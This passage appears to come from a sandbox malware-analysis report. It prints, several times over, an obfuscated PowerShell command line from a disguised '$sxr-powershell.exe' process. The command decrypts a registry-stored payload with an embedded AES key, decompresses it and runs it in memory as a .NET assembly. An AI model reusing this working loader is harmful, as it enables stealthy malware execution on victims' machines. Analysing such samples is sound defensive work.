'')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        11⤵
        Executes dropped EXE
        
        PID:6504
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7152).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        11⤵
        Executes dropped EXE
        
        PID:5524
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7152).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        11⤵
        Executes dropped EXE
        
        PID:1444
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7152).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 